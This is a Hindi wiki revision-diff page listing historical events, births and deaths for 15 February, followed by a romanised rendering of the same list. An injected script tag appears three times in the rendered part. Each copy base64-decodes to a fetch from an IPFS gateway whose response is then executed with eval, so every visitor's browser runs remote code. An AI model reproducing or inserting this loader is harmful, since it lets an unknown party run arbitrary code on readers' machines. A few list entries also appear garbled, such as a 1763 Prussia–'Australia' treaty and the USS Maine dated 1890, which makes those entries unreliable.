Difference between revisions of "15 फ़रवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(19 intermediate revisions by 6 users not shown)
Line 4: Line 4:
  
 
==15 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 
==15 फ़रवरी की महत्त्वपूर्ण घटनाएँ==
 +
* 1564 - महान् खगोलशास्त्री गैलीलियो का जन्म।
 +
* 1677 - [[इंग्लैंड]] नरेश चार्ल्स द्वितीय ने [[फ़्रांस]] के ख़िलाफ़ डचों से गठबंधन किया।
 +
* 1763 - प्रसिया और [[आस्ट्रेलिया]] के बीच शांति संधि हुई।
 +
* 1764 - [[अमेरिका]] में सेंट लुईस शहर की स्थापना हुई।
 +
* 1798 - फ़्रांस ने रोम पर कब्ज़ा कर उसे गणराज्य घोषित किया।
 +
* 1806 - फ़्रैंको, प्रसियन संधि के बाद प्रसिया ने ब्रिटिश जहाज़ों के लिए अपने बंदरगाह बंद किये।
 +
* [[1890]] - अमेरिकी युद्धपोत मेने हवाना बंदरगाह पर विस्फोट से उड़ा दिया गया।
 +
* [[1906]] - ब्रिटेन की लेबर पार्टी का गठन।
 +
* [[1909]] - एकापुल्को मैक्सिको में फ़्लोरेंस सिनेमागृह में आग से 250 लोगों की मृत्यु।
 +
* [[1926]] - [[अमेरिका]] में अनुबंध एयर मेल सेवा की शुरूआत।
 
* [[1942]] - द्वितीय विश्व युद्ध में सिंगापुर का पतन हुआ व जापानी बलों द्वारा एक हमले के बाद, ब्रिटिश जनरल आर्थर पेरसिवल ने समर्पण कर दिया। लगभग 80,000 भारतीय, ब्रिटेन और ऑस्ट्रेलियाई सैनिक युद्ध-बंदी हो गये।
 
* [[1942]] - द्वितीय विश्व युद्ध में सिंगापुर का पतन हुआ व जापानी बलों द्वारा एक हमले के बाद, ब्रिटिश जनरल आर्थर पेरसिवल ने समर्पण कर दिया। लगभग 80,000 भारतीय, ब्रिटेन और ऑस्ट्रेलियाई सैनिक युद्ध-बंदी हो गये।
 +
* [[1944]] - ब्रिटेन के सैकड़ों विमानों ने बर्लिन पर बमबारी की।
 +
* [[1961]] - बेल्जियम में बोइंग 707 विमान के दुर्घटनाग्रस्त हो जाने से 73 लोगों की मौत।
 +
* [[1962]] - [[अमेरिका]] ने नेवादा परीक्षण स्थल पर परमाणु परीक्षण किया।
 +
* [[1965]] - मैपल (एक प्रकार का छायादार वृक्ष) के पत्ते को कनाडा के आधिकारिक ध्वज में स्थान मिला।
 +
* [[1967]] - भारत में चौथी लोकसभा के लिए चुनाव हुए।
 +
* [[1976]] - [[मध्य प्रदेश]] के [[भोपाल]] में केन्द्रीय कृषि अनुसंधान संस्थान की स्थापना की गई।
 +
* [[1970]] - इस्रायली पाइप लाइन का उद्घाटन हुआ।
 
* [[1982]] - [[श्रीलंका]] द्वारा राजधानी का कोलम्बो से जनवर्धनपुर को स्थानांतरण।  
 
* [[1982]] - [[श्रीलंका]] द्वारा राजधानी का कोलम्बो से जनवर्धनपुर को स्थानांतरण।  
 +
* [[1988]] - आस्ट्रिया के प्रधानमंत्री कुर्त बाल्दीहीम ने नाजी अतीत का आरोप ठुकराते हुए इस्तीफ़ा देने से इन्कार कर दिया।
 +
* [[1989]] - सोवियत संघ की आख़िरी सैनिक टुकड़ी अफ़ग़ानिस्तान से वापस।
 +
* [[1991]] - ईराक ने कुवैत से हटने की घोषणा की।
 +
* [[1995]] - ताइवान के रात्रि क्लब में आग लगने से 67 लोग मारे गए।
 
* [[1999]] - परमाणु अस्त्र पर रोक लगाने के उद्देश्य से मिस्र में निगरानी केंद्र की स्थापना करने की घोषणा।  
 
* [[1999]] - परमाणु अस्त्र पर रोक लगाने के उद्देश्य से मिस्र में निगरानी केंद्र की स्थापना करने की घोषणा।  
 +
* [[2000]] - प्रसिद्ध फिल्म निर्माता निर्देशक बी.आर चोपड़ा को दादा साहेब फाल्के पुरस्कार प्रदान किया गया।
 
* [[2001]] - इस्रायल में हिंसा, अल सल्वाडोर में भूकम्प से मरने वाले लोगों की संख्या 300 तक पहुँची, इस्रायल ने पश्चिमी तट पर गाजा पट्टी सील की, भारत का रूस से टी-90 टैंकों की ख़रीद का समझौता।  
 
* [[2001]] - इस्रायल में हिंसा, अल सल्वाडोर में भूकम्प से मरने वाले लोगों की संख्या 300 तक पहुँची, इस्रायल ने पश्चिमी तट पर गाजा पट्टी सील की, भारत का रूस से टी-90 टैंकों की ख़रीद का समझौता।  
 
* [[2002]] - मुशर्रफ़ ने पैंतरा बदला, भारतीय संसद पर हमले को आतंकवादी हमला मानने से इन्कार, अफ़ग़ानिस्तान में हज यात्रियों की भीड़ ने पर्यटन मंत्री अब्दुल रहमान को पीट-पीटकर मार डाला।
 
* [[2002]] - मुशर्रफ़ ने पैंतरा बदला, भारतीय संसद पर हमले को आतंकवादी हमला मानने से इन्कार, अफ़ग़ानिस्तान में हज यात्रियों की भीड़ ने पर्यटन मंत्री अब्दुल रहमान को पीट-पीटकर मार डाला।
* [[2008]] - [[हिन्द महासागर]] के तटीय देशों के नौसेना प्रमुखों का पहला सम्मेलन [[नई दिल्ली]] में सम्पन्न।
+
* [[2003]] -
 +
**एरियन 4 राकेट से दूरसंचार उपग्रह '[[इंटलसैट]]' अंतरिक्ष में छोड़ा गया।
 +
**इराक युद्ध के ख़िलाफ़ विश्व के 600 शहरों में लाखों लोग सड़कों पर लामबद्ध हुए।
 +
* [[2005]] -
 +
**ईरान की राजधानी तेहरान में नमाजियों से खचाखच भरी एक मस्जिद में आग लगने से 59 लोगों की मृत्यु।
 +
**गुजरात के जूनागढ़ स्थित स्वामीनारायण मन्दिर के पुजारी सहित चार लोगों को सेक्स स्कैंडल में गिरफ़्तार किया गया।
 +
** लोकप्रिय इंटरनेट साइट यूट्यूब, जिस पर वीडियो देखा और साझा किया जा सकता है, संयुक्त राज्य अमेरिका में लांच किया गया।
 +
* [[2006]] - पाकिस्तान की कैबिनेट ने दक्षिण एशिया मुक्त क्षेत्र समझौता (साफ़्टा) स्वीकार किया।
 +
* [[2007]] -
 +
**बांग्लादेश की अंतरिम सरकार ने भ्रष्ट व्यक्तियों के चुनाव लड़ने पर प्रतिबंध लगाया।
 +
**इटली के प्रधानमंत्री रोमानो प्रोदी भारत यात्रा पर आए।
 +
* [[2008]] -  
 +
**[[हिन्द महासागर]] के तटीय देशों के नौसेना प्रमुखों का पहला सम्मेलन [[नई दिल्ली]] में सम्पन्न।
 +
**खगोलविदों ने सौरमंडल की तरह एक दूसरे सौरमंडल की खोज की।
 
* [[2009]] - सार्वजनिक क्षेत्र की तेल कम्पनियों ने विमान ईधन (एटीएफ) की क़ीमतो में 3.7% की कमी की।  
 
* [[2009]] - सार्वजनिक क्षेत्र की तेल कम्पनियों ने विमान ईधन (एटीएफ) की क़ीमतो में 3.7% की कमी की।  
 
* [[2010]]-  
 
* [[2010]]-  
 
**केंद्रीय गृह मंत्री पी.चिदम्बरम के ऑपरेशन ग्रीनहंट शुरू करने के छह दिन के अंदर ही सशस्त्र माओवादियों ने पश्चिम बंगाल में पश्चिम मिदनापुर ज़िला स्थित सिल्दा शिविर पर हमला कर राज्य में माओवादी निरोधक अभियान में शामिल ईस्टर्न फ्रंटियर राइफल्स (ईएफ़आर) के 24 जवानों की हत्या कर दी।  
 
**केंद्रीय गृह मंत्री पी.चिदम्बरम के ऑपरेशन ग्रीनहंट शुरू करने के छह दिन के अंदर ही सशस्त्र माओवादियों ने पश्चिम बंगाल में पश्चिम मिदनापुर ज़िला स्थित सिल्दा शिविर पर हमला कर राज्य में माओवादी निरोधक अभियान में शामिल ईस्टर्न फ्रंटियर राइफल्स (ईएफ़आर) के 24 जवानों की हत्या कर दी।  
**[[जयपुर]] घराने की कथक नृत्यागंना प्रेरणा श्रीमाली को 2009 के संगीत नाटक अकादमी पुरस्कार के लिए चुना गया।
+
**[[जयपुर-अतरौली घराना|जयपुर घराने]] की कथक नृत्यागंना प्रेरणा श्रीमाली को 2009 के संगीत नाटक अकादमी पुरस्कार के लिए चुना गया।
 
+
* [[2012]] - मध्य अमेरिकी देश होंडुरास स्थित कोमायागुआ जेल में भीषण आग में 358 लोगों की मौत।
 +
* [[2017]]- [[इसरो]] ने एक साथ रिकार्ड 104 सैटेलाइट लॉन्च करके इतिहास रचा।
 
==15 फ़रवरी को जन्मे व्यक्ति==
 
==15 फ़रवरी को जन्मे व्यक्ति==
* [[1921]] - [[राधाकृष्ण चौधरी]], भारतीय इतिहासकार व लेखक (मृत्यु- 1985)
+
* [[1924]] - [[के.जी. सुब्रह्मण्यम]] - भारतीय मूर्तिकार और भित्ति चित्रकार थे।
 +
* [[1872]] - [[विलियम मैल्कम हेली]] -उत्तर प्रदेश के भूतपूर्व राज्यपाल थे।
 +
* [[1921]] - [[राधाकृष्ण चौधरी]], भारतीय इतिहासकार व लेखक (मृत्यु- [[1985]])
 
* [[1984]] - मीरा जेसमिन - भारतीय [[अभिनेत्री]]
 
* [[1984]] - मीरा जेसमिन - भारतीय [[अभिनेत्री]]
 +
* [[1949]] - [[राधावल्लभ त्रिपाठी]] - [[संस्कृत भाषा]] के प्रतिष्ठित साहित्यकार के रूप में जाने जाते हैं।
 +
* [[1922]] - [[नरेश मेहता]]- [[ज्ञानपीठ पुरस्कार]] से सम्मानित [[हिन्दी]] के यशस्वी [[कवि]]
 +
 
==15 फ़रवरी को हुए निधन==
 
==15 फ़रवरी को हुए निधन==
* [[1869]] - [[मिर्ज़ा ग़ालिब]] - भारतीय शायर (जन्म- 1796)
+
* [[1983]] - [[उज्जवल सिंह]] - [[पंजाब]] के प्रमुख [[सिक्ख]] कार्यकर्ता थे।
* [[1948]] - [[सुभद्रा कुमारी चौहान]], रसिद्ध कवयित्री
+
* [[1869]] - [[मिर्ज़ा ग़ालिब]] - भारतीय शायर (जन्म- 1797)
 +
* [[1948]] - [[सुभद्रा कुमारी चौहान]], प्रसिद्ध कवयित्री
  
 
==15 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==15 फ़रवरी के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* उत्पादकता सप्ताह।
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-day-15-february/today-in-history/news/780885.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Revision as of 08:04, 6 May 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 15 faravari varsh ka 46 vaan din hai. sal mean abhi aur 319 din shesh haian. (lip varsh mean 320 din)

15 faravari ki mahattvapoorn ghatanaean

  • 1564 - mahanh khagolashastri gaililiyo ka janm.
  • 1677 - ianglaiand naresh charls dvitiy ne fraans ke khilaf dachoan se gathabandhan kiya.
  • 1763 - prasiya aur astreliya ke bich shaanti sandhi huee.
  • 1764 - amerika mean seant luees shahar ki sthapana huee.
  • 1798 - fraans ne rom par kabza kar use ganarajy ghoshit kiya.
  • 1806 - fraianko, prasiyan sandhi ke bad prasiya ne british jahazoan ke lie apane bandaragah band kiye.
  • 1890 - ameriki yuddhapot mene havana bandaragah par visphot se u da diya gaya.
  • 1906 - briten ki lebar parti ka gathan.
  • 1909 - ekapulko maiksiko mean floreans sinemagrih mean ag se 250 logoan ki mrityu.
  • 1926 - amerika mean anubandh eyar mel seva ki shurooat.
  • 1942 - dvitiy vishv yuddh mean siangapur ka patan hua v japani baloan dvara ek hamale ke bad, british janaral arthar perasival ne samarpan kar diya. lagabhag 80,000 bharatiy, briten aur aaustreliyaee sainik yuddh-bandi ho gaye.
  • 1944 - briten ke saik doan vimanoan ne barlin par bamabari ki.
  • 1961 - beljiyam mean boiang 707 viman ke durghatanagrast ho jane se 73 logoan ki maut.
  • 1962 - amerika ne nevada parikshan sthal par paramanu parikshan kiya.
  • 1965 - maipal (ek prakar ka chhayadar vriksh) ke patte ko kanada ke adhikarik dhvaj mean sthan mila.
  • 1967 - bharat mean chauthi lokasabha ke lie chunav hue.
  • 1976 - madhy pradesh ke bhopal mean kendriy krishi anusandhan sansthan ki sthapana ki gee.
  • 1970 - israyali paip lain ka udghatan hua.
  • 1982 - shrilanka dvara rajadhani ka kolambo se janavardhanapur ko sthanaantaran.
  • 1988 - astriya ke pradhanamantri kurt baldihim ne naji atit ka arop thukarate hue istifa dene se inkar kar diya.
  • 1989 - soviyat sangh ki akhiri sainik tuk di afaganistan se vapas.
  • 1991 - eerak ne kuvait se hatane ki ghoshana ki.
  • 1995 - taivan ke ratri klab mean ag lagane se 67 log mare ge.
  • 1999 - paramanu astr par rok lagane ke uddeshy se misr mean nigarani keandr ki sthapana karane ki ghoshana.
  • 2000 - prasiddh philm nirmata nirdeshak bi.ar chop da ko dada saheb phalke puraskar pradan kiya gaya.
  • 2001 - israyal mean hiansa, al salvador mean bhookamp se marane vale logoan ki sankhya 300 tak pahuanchi, israyal ne pashchimi tat par gaja patti sil ki, bharat ka roos se ti-90 taiankoan ki kharid ka samajhauta.
  • 2002 - musharraf ne paiantara badala, bharatiy sansad par hamale ko atankavadi hamala manane se inkar, afaganistan mean haj yatriyoan ki bhi d ne paryatan mantri abdul rahaman ko pit-pitakar mar dala.
  • 2003 -
    • eriyan 4 raket se doorasanchar upagrah 'iantalasait' aantariksh mean chho da gaya.
    • irak yuddh ke khilaf vishv ke 600 shaharoan mean lakhoan log s dakoan par lamabaddh hue.
  • 2005 -
    • eeran ki rajadhani teharan mean namajiyoan se khachakhach bhari ek masjid mean ag lagane se 59 logoan ki mrityu.
    • gujarat ke joonagadh sthit svaminarayan mandir ke pujari sahit char logoan ko seks skaiandal mean giraftar kiya gaya.
    • lokapriy iantaranet sait yootyoob, jis par vidiyo dekha aur sajha kiya ja sakata hai, sanyukt rajy amerika mean laanch kiya gaya.
  • 2006 - pakistan ki kaibinet ne dakshin eshiya mukt kshetr samajhauta (safta) svikar kiya.
  • 2007 -
    • baangladesh ki aantarim sarakar ne bhrasht vyaktiyoan ke chunav l dane par pratibandh lagaya.
    • itali ke pradhanamantri romano prodi bharat yatra par ae.
  • 2008 -
    • hind mahasagar ke tatiy deshoan ke nausena pramukhoan ka pahala sammelan nee dilli mean sampann.
    • khagolavidoan ne sauramandal ki tarah ek doosare sauramandal ki khoj ki.
  • 2009 - sarvajanik kshetr ki tel kampaniyoan ne viman eedhan (etieph) ki qimato mean 3.7% ki kami ki.
  • 2010-
    • keandriy grih mantri pi.chidambaram ke aaupareshan grinahant shuroo karane ke chhah din ke aandar hi sashastr maovadiyoan ne pashchim bangal mean pashchim midanapur zila sthit silda shivir par hamala kar rajy mean maovadi nirodhak abhiyan mean shamil eestarn phrantiyar raiphals (eeefar) ke 24 javanoan ki hatya kar di.
    • jayapur gharane ki kathak nrityaganna prerana shrimali ko 2009 ke sangit natak akadami puraskar ke lie chuna gaya.
  • 2012 - madhy ameriki desh hoanduras sthit komayagua jel mean bhishan ag mean 358 logoan ki maut.
  • 2017- isaro ne ek sath rikard 104 saitelait l aaunch karake itihas racha.

15 faravari ko janme vyakti

15 faravari ko hue nidhan

15 faravari ke mahattvapoorn avasar evan utsav

  • utpadakata saptah.

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>